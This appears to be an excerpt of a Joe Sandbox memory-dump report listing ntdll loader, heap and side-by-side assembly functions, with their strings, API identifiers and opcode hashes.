                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                • API String ID: 0-861424205
                                                                • Opcode ID: 6ceb368f1d862e859f04735f36e822d9789e76b69828465693430a30fc1807b7
                                                                • Instruction ID: 403bd8652226ca9a1c6ee9f52cac8b4edadab00a174fdbb7510c315515401ea2
                                                                • Opcode Fuzzy Hash: 6ceb368f1d862e859f04735f36e822d9789e76b69828465693430a30fc1807b7
                                                                • Instruction Fuzzy Hash: 35310536B40215F7E7298A9A9C81F6FBB68DB65E90F15006DFB14BB144D3709A01CBA1
                                                                Function 0111C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 011581E5
                                                                • Loading import redirection DLL: '%wZ', xrefs: 01158170
                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01158181, 011581F5
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0111C6C3
                                                                • LdrpInitializeImportRedirection, xrefs: 01158177, 011581EB
                                                                • LdrpInitializeProcess, xrefs: 0111C6C4
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                • API String ID: 0-475462383
                                                                • Opcode ID: 021bdf8390cc2fad61f61b86eb4fe28a63faaecee57f6b3df02869f3e4f19e3f
                                                                • Instruction ID: b8f93b4f4674c6c6d4a67c54c6220f9a66d0f9f009dee6f6665b19ff4d78de33
                                                                • Opcode Fuzzy Hash: 021bdf8390cc2fad61f61b86eb4fe28a63faaecee57f6b3df02869f3e4f19e3f
                                                                • Instruction Fuzzy Hash: 2F312671A457069FC31CEB29D846E2EB7A4AF94B14F05092CF9905B391E720EC04CBA2
                                                                Function 0112096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 01122DF0: LdrInitializeThunk.NTDLL ref: 01122DFA
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01120BA3
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01120BB6
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01120D60
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01120D74
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                • String ID:
                                                                • API String ID: 1404860816-0
                                                                • Opcode ID: fe272326a0287352fd7b6be3ca242f5950ad421c10b561c35c613156ab13d133
                                                                • Instruction ID: bf2fccc7ae8edacbe3cc5b9dd7abfbc71ce7c4089e42a0aaba5c490b4d1e8db2
                                                                • Opcode Fuzzy Hash: fe272326a0287352fd7b6be3ca242f5950ad421c10b561c35c613156ab13d133
                                                                • Instruction Fuzzy Hash: AC428E71900729DFDB69CF28C880BAAB7F5FF08314F0445A9E999DB241E770A994CF61
                                                                Function 010EA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                • API String ID: 0-379654539
                                                                • Opcode ID: e4b5cb13f599018ba79da936ccedc9cf145ede5948f03ddceaf360ba5af3e788
                                                                • Instruction ID: c08d8ac770ca43c7f5b760e61663ea762d8d27a476a54c7bd3bcd6efb89f453f
                                                                • Opcode Fuzzy Hash: e4b5cb13f599018ba79da936ccedc9cf145ede5948f03ddceaf360ba5af3e788
                                                                • Instruction Fuzzy Hash: EFC1ACB5608382CFD715CF5AC048B6ABBE4FF88704F04896AF9D58B251E734CA49CB56
                                                                Function 01118402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0111855E
                                                                • @, xrefs: 01118591
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01118421
                                                                • LdrpInitializeProcess, xrefs: 01118422
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-1918872054
                                                                • Opcode ID: 27749f3ebcb4651341629509e66dc69520632d47bd8c173333f872e9c2af8a83
                                                                • Instruction ID: 9592313bb82872362026bbca9a3e799c1ef12de03404d6f1caa016fbafdb180a
                                                                • Opcode Fuzzy Hash: 27749f3ebcb4651341629509e66dc69520632d47bd8c173333f872e9c2af8a83
                                                                • Instruction Fuzzy Hash: 5A919871548345AFD769DF25CC80FAFBAE8FF88688F40492EFA8496154E734D904CB62
                                                                Function 0111273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 011522B6
                                                                • SXS: %s() passed the empty activation context, xrefs: 011521DE
                                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 011521D9, 011522B1
                                                                • .Local, xrefs: 011128D8
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                • API String ID: 0-1239276146
                                                                • Opcode ID: 2ef668d92542a1a0bc0307d44e5e811920ee05159f9155643058ed730aad4fbe
                                                                • Instruction ID: ae2fe85fbc247fec0dd63514d609608f72a7bd9a6ed8c62770b76d082ff34597
                                                                • Opcode Fuzzy Hash: 2ef668d92542a1a0bc0307d44e5e811920ee05159f9155643058ed730aad4fbe
                                                                • Instruction Fuzzy Hash: 45A1C03590022EDFDB28CF68C884BA9B7B1BF58354F2541F9D958AB255E7309E80CF91
                                                                Function 010E64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01141028
                                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 011410AE
                                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0114106B
                                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01140FE5
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                • API String ID: 0-1468400865
                                                                • Opcode ID: 044b3583f401c5d5069766835c3ea6b549f9964c4bc5d5c7d88f0381a12082d5
                                                                • Instruction ID: 54167c1df088d67b46889825b90b029139ec80960dc8c477848b634ba294bd9c
                                                                • Opcode Fuzzy Hash: 044b3583f401c5d5069766835c3ea6b549f9964c4bc5d5c7d88f0381a12082d5
                                                                • Instruction Fuzzy Hash: D671D172A043159FCB21DF19D885F9B7FE8AFA4764F000468F9888B146D735D588CBD2
                                                                Function 0110245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • LdrpDynamicShimModule, xrefs: 0114A998
                                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0114A992
                                                                • apphelp.dll, xrefs: 01102462
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0114A9A2
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-176724104
                                                                • Opcode ID: 07ea971934e8cd8e59dfa3be4dcf57ac0a205d103111ad69c05d5501314bcecc
                                                                • Instruction ID: d67e32dd76fb68d841e89038468b29aa4481737bdd22b61fb6796beedaf305f3
                                                                • Opcode Fuzzy Hash: 07ea971934e8cd8e59dfa3be4dcf57ac0a205d103111ad69c05d5501314bcecc
                                                                • Instruction Fuzzy Hash: 86315D76A42301EBD73D9F5DD885AAE77B4FF84F04F170029E521A7245D7B05881C781
                                                                Function 010F29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 010F327D
                                                                • HEAP[%wZ]: , xrefs: 010F3255
                                                                • HEAP: , xrefs: 010F3264
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                • API String ID: 0-617086771
                                                                • Opcode ID: 9f117da4a85091aeb9ca6e0a03df050bab9eb29dbb9b0bed351423f47c3c94d7
                                                                • Instruction ID: 986fbd5a99947162755ff6e160e587e101ff0c7e38fd00f474f55206f373e2c4
                                                                • Opcode Fuzzy Hash: 9f117da4a85091aeb9ca6e0a03df050bab9eb29dbb9b0bed351423f47c3c94d7
                                                                • Instruction Fuzzy Hash: 9A92CC70A042499FDB29CF68C4417AEBBF1FF48314F1880ADEA95ABB91D734A945CF50
                                                                Function 010F0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                • API String ID: 0-4253913091
                                                                • Opcode ID: 3d1b26081babfdb1e3f5bbb84079bd3daa64b188c923f3ffc78f20b9136c1079
                                                                • Instruction ID: 4910f67db566b6ef38aecf5179ad07b352529197d2a5e7235da37abfaecbd566
                                                                • Opcode Fuzzy Hash: 3d1b26081babfdb1e3f5bbb84079bd3daa64b188c923f3ffc78f20b9136c1079
                                                                • Instruction Fuzzy Hash: 7CF1BF34600606DFEB19CF68C881B6AB7F2FF44704F1481ADE6969B746D734E981CB90
                                                                Function 01106962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $@
                                                                • API String ID: 0-1077428164
                                                                • Opcode ID: 11d20c8d87f1c60bd0b7e1113aef2735d23270e48d5f63b050942e5569de940a
                                                                • Instruction ID: 1a40960b5647ee77ce7edc438b15b2904f26ab665c85c11cd7056f7a6fe62b4f
                                                                • Opcode Fuzzy Hash: 11d20c8d87f1c60bd0b7e1113aef2735d23270e48d5f63b050942e5569de940a
                                                                • Instruction Fuzzy Hash: 34C28371A093419FD72ACF28C441BABBBE5AF88754F05892DF9C9C7281D774E805CB92
                                                                Function 010DA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: FilterFullPath$UseFilter$\??\
                                                                • API String ID: 0-2779062949
                                                                • Opcode ID: 83fdffeafabee1c7d233435f9eeea1aeb68c55aa483bff895b897b89bca75f7d
                                                                • Instruction ID: fad85ead06308bcf467994d1a3a3e74941b40b1fb3f38ff95bcd47861820c55e
                                                                • Opcode Fuzzy Hash: 83fdffeafabee1c7d233435f9eeea1aeb68c55aa483bff895b897b89bca75f7d
                                                                • Instruction Fuzzy Hash: 4EA16D719016299BDB35DF28CC88BEEB7B8EF44714F1001EAEA09A7250D7359E84CF94
                                                                Function 01100BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • LdrpCheckModule, xrefs: 0114A117
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0114A121
                                                                • Failed to allocated memory for shimmed module list, xrefs: 0114A10F
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-161242083
                                                                • Opcode ID: 1a5a9ef58225bb54f92568f1cec2e90167a7dc586d9f5a73dd8ebf93bd75244f
                                                                • Instruction ID: 5b6ef7bcd52770280c7ddc0f0c7a9b5759c2400fbf46c62ff7384b25c0b4edd9
                                                                • Opcode Fuzzy Hash: 1a5a9ef58225bb54f92568f1cec2e90167a7dc586d9f5a73dd8ebf93bd75244f
                                                                • Instruction Fuzzy Hash: 06710E71E012069FDB2EDF68CA81BAEB7F4FF48744F05406DE512AB280E770A981CB51
                                                                Function 010F0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                • API String ID: 0-1334570610
                                                                • Opcode ID: 06c0706873e28db5ce257b623ff9d82bfceec74a9793ad72dcedc07a196b9314
                                                                • Instruction ID: 60b335ea7f5292c87ab1245b2a1f82a628d602e5739ad863ae0e315ad99f2835
                                                                • Opcode Fuzzy Hash: 06c0706873e28db5ce257b623ff9d82bfceec74a9793ad72dcedc07a196b9314
                                                                • Instruction Fuzzy Hash: A061D170604305DFDB69CF28C841BAABBE2FF45704F1485ADE5958F68AD770E881CB91
                                                                Function 0111C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • Failed to reallocate the system dirs string !, xrefs: 011582D7
                                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 011582DE
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 011582E8
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-1783798831
                                                                • Opcode ID: f9fccc3bea8949e22949c83abc9d3126d51930819074d75d214a259cd99d1671
                                                                • Instruction ID: 0df90fbc1aea3e5ace61e40ec523c2d1e26b369eea0bb8b332ea04e2af42935e
                                                                • Opcode Fuzzy Hash: f9fccc3bea8949e22949c83abc9d3126d51930819074d75d214a259cd99d1671
                                                                • Instruction Fuzzy Hash: 33414171546711ABC72DEB68D885B9BBBE8AF48750F00483AF9A4D3294E7B0D840CBD1
                                                                Function 0119C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0119C1C5
                                                                • PreferredUILanguages, xrefs: 0119C212
                                                                • @, xrefs: 0119C1F1
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                • API String ID: 0-2968386058
                                                                • Opcode ID: b41bb234e9db5e0aac10cb51255c39d2c58fcc95ae22836528d5042e8dcf9cdb
                                                                • Instruction ID: 32c4930e248c7bd146d77d5041c522776f1e24f34602bb52fad9a6abf5feca65
                                                                • Opcode Fuzzy Hash: b41bb234e9db5e0aac10cb51255c39d2c58fcc95ae22836528d5042e8dcf9cdb
                                                                • Instruction Fuzzy Hash: E2419671E00219EBDF19DFD8C891FEEBBB9AB14704F1040AAE659F7280D7749A44CB90
                                                                Function 01174144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                • API String ID: 0-1373925480
                                                                • Opcode ID: 4dbdfb0e01f2c74510c6a8d55e9d3aa92d29f14d4d6fda8f03189cc341ae2d6f
                                                                • Instruction ID: e32db91446a74d9bf690a2f01c265261a65328e85f659e1f3e7b6524c334837b
                                                                • Opcode Fuzzy Hash: 4dbdfb0e01f2c74510c6a8d55e9d3aa92d29f14d4d6fda8f03189cc341ae2d6f
                                                                • Instruction Fuzzy Hash: 23414532A002598FEB2EEBD8E840BADBBB8FF55340F150459D941EFB91D7349901CB11
                                                                Function 01164755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01164888
                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01164899
                                                                • LdrpCheckRedirection, xrefs: 0116488F
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                • API String ID: 0-3154609507
                                                                • Opcode ID: 78faf95bcd1b8eb3cf1c6535d2060baf9fd728d8ecc233bc123e7120dfccea5b
                                                                • Instruction ID: 0b4fdfcb9fcb995dba96599244d6b3b2ef8e67150569aaa720af140740e52bcd
                                                                • Opcode Fuzzy Hash: 78faf95bcd1b8eb3cf1c6535d2060baf9fd728d8ecc233bc123e7120dfccea5b
                                                                • Instruction Fuzzy Hash: 7C41F732A06A519FCB29CF9CD940A667BECFF89A50F06016DED94D7B51D332D820CB81
                                                                Function 010F0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                • API String ID: 0-2558761708
                                                                • Opcode ID: 3b75b9d4979b7076e74f407a320f29bfe4a2ea299ffb87c56fe034c323d6177b
                                                                • Instruction ID: 58ef6c56efd5d2fcf728944a6a620f07dedb969140e6cf2e057314f7f8538606
                                                                • Opcode Fuzzy Hash: 3b75b9d4979b7076e74f407a320f29bfe4a2ea299ffb87c56fe034c323d6177b
                                                                • Instruction Fuzzy Hash: 591124303161469FDB5DCB18C842BBAB3A2EF41A1AF19806DF586CF656EB30D840C751
                                                                Function 011620DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • Process initialization failed with status 0x%08lx, xrefs: 011620F3
                                                                • LdrpInitializationFailure, xrefs: 011620FA
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01162104
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-2986994758
                                                                • Opcode ID: 463ac6f00396cc8aa0a1402fdf9945f13fe315f8dee492a345d5037c6115f070
                                                                • Instruction ID: 66a011b48ba54465f8b8e234771c475ab93c67723714d1c8149c857dbb975df8
                                                                • Opcode Fuzzy Hash: 463ac6f00396cc8aa0a1402fdf9945f13fe315f8dee492a345d5037c6115f070
                                                                • Instruction Fuzzy Hash: 9DF0C275642708ABE72CE74CCC46F9A376CEB40B58F61006DFA507B681D3B1A950CA91
                                                                Function 010F03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: #%u
                                                                • API String ID: 48624451-232158463
                                                                • Opcode ID: 634cb18ac76d06cea9d69361d394ef68cc40ed11f994e445973074d67d48a009
                                                                • Instruction ID: b4b08065869874a3c9a4e28bfec951c5b8e1ee72c170987ad306fe52fa7b9ff8
                                                                • Opcode Fuzzy Hash: 634cb18ac76d06cea9d69361d394ef68cc40ed11f994e445973074d67d48a009
                                                                • Instruction Fuzzy Hash: 9E715B71A0014A9FDB05DFA8C991FAEB7F8BF18744F144069EA41EB651EB34ED41CB60
                                                                Function 010EA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • LdrResSearchResource Enter, xrefs: 010EAA13
                                                                • LdrResSearchResource Exit, xrefs: 010EAA25
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                • API String ID: 0-4066393604
                                                                • Opcode ID: 2a4357dff8e5fc12f43e4570a2afd234ef413608019d9f97339ca8222f6282c3
                                                                • Instruction ID: 99c6fdd1ebab5e557ba966d42eda12499799471006848e84260c4e9754eafb46
                                                                • Opcode Fuzzy Hash: 2a4357dff8e5fc12f43e4570a2afd234ef413608019d9f97339ca8222f6282c3
                                                                • Instruction Fuzzy Hash: BEE1AD71F00219EFEF2A8E9AD988BAEBBF9BF08710F144466E951E7241D7349940CB51
                                                                Function 011AA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: `$`
                                                                • API String ID: 0-197956300
                                                                • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                • Instruction ID: a312a91aa4ec4bda63d0f4828c02eba8d3a40899bd5bbf09350e92ee9fdaffe4
                                                                • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                • Instruction Fuzzy Hash: 10C1D1352043429BEB29CF28D841B6BBFE5AFC4318F484A2DF69ACB290D775D505CB42
                                                                Function 0115E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID: Legacy$UEFI
                                                                • API String ID: 2994545307-634100481
                                                                • Opcode ID: 2693d0d0ea607aac45a0ee33cd244d94f2647c8a6c656236fb8e657a6c953c95
                                                                • Instruction ID: 6b114ba9a26d48379053a0f82646c38dc114e06a1a0a3e431d319141b141f7f1
                                                                • Opcode Fuzzy Hash: 2693d0d0ea607aac45a0ee33cd244d94f2647c8a6c656236fb8e657a6c953c95
                                                                • Instruction Fuzzy Hash: 93616C72E01619DFDB58DFA8C940BADFBB5FB48704F14406DEA69EB251D731AA00CB50
                                                                Function 011843D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$MUI
                                                                • API String ID: 0-17815947
